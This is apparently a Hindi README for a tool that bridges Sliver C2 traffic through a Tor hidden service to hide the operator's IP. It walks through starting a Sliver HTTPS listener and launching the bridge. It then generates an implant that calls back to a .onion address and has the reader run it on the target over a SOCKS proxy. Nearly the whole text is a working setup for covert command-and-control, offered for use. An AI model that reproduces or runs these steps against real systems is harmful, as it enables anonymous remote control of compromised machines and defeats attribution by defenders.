
Sliver C2 के लिए Tor transport bridge - गुमनाम command and control
sliver c2 के लिए tor-आधारित ट्रांसपोर्ट ब्रिज। एक हिडन सर्विस बनाता है और आपके sliver सर्वर पर ट्रैफ़िक को प्रॉक्सी करता है ताकि आपका वास्तविक IP कभी उजागर न हो।
एक tor हिडन सर्विस सेटअप करता है जो एक स्थानीय HTTP प्रॉक्सी की ओर इशारा करता है। प्रॉक्सी सब कुछ sliver के HTTPS लिसनर पर फॉरवर्ड करता है। इम्प्लांट्स tor के माध्यम से जुड़ते हैं, आप उन्हें सामान्य रूप से sliver के ज़रिए नियंत्रित करते हैं।
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
एक HTTPS लिसनर के साथ sliver शुरू करें:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
दूसरे टर्मिनल में, ब्रिज शुरू करें:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
आउटपुट कुछ इस तरह दिखेगा:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
.onion पते की प्रतीक्षा करें, फिर एक इम्प्लांट जनरेट करें:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
लक्ष्य पर इम्प्लांट चलाएँ (tor की आवश्यकता है):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port sliver https पोर्ट (डिफ़ॉल्ट 8443)
--tor-port tor socks पोर्ट (डिफ़ॉल्ट 9050)
--service-port हिडन सर्विस पोर्ट (डिफ़ॉल्ट 80)
-c, --config कॉन्फ़िग फ़ाइल पथ
अन्य कमांड:
sliver-tor-bridge status # जाँचें कि हिडन सर्विस चल रही है या नहीं
sliver-tor-bridge stop # हिडन सर्विस डायरेक्टरी को साफ करें
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]ब्रिज बीच में बैठकर ट्रैफ़िक को रिले करता है। sliver को लगता है कि वह सामान्य HTTPS कनेक्शन प्राप्त कर रहा है। इम्प्लांट को लगता है कि वह एक सामान्य HTTP सर्वर से बात कर रहा है।
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # कमांड लाइन इंटरफ़ेस
tor_manager.py # tor शुरू करता है और हिडन सर्विस बनाता है
proxy.py # flask ऐप जो sliver पर फॉरवर्ड करता है
config.py # कॉन्फ़िगरेशन हैंडलिंग
tor शुरू नहीं हो रहा: सुनिश्चित करें कि सिस्टम tor बंद है (sudo systemctl stop tor)
कनेक्शन टाइमआउट: tor बूटस्ट्रैप में 1-3 मिनट लग सकते हैं, 100% तक प्रतीक्षा करें
इम्प्लांट कनेक्ट नहीं हो रहा: सुनिश्चित करें कि इम्प्लांट के पास tor एक्सेस है (socks प्रॉक्सी 9050 पर)
mit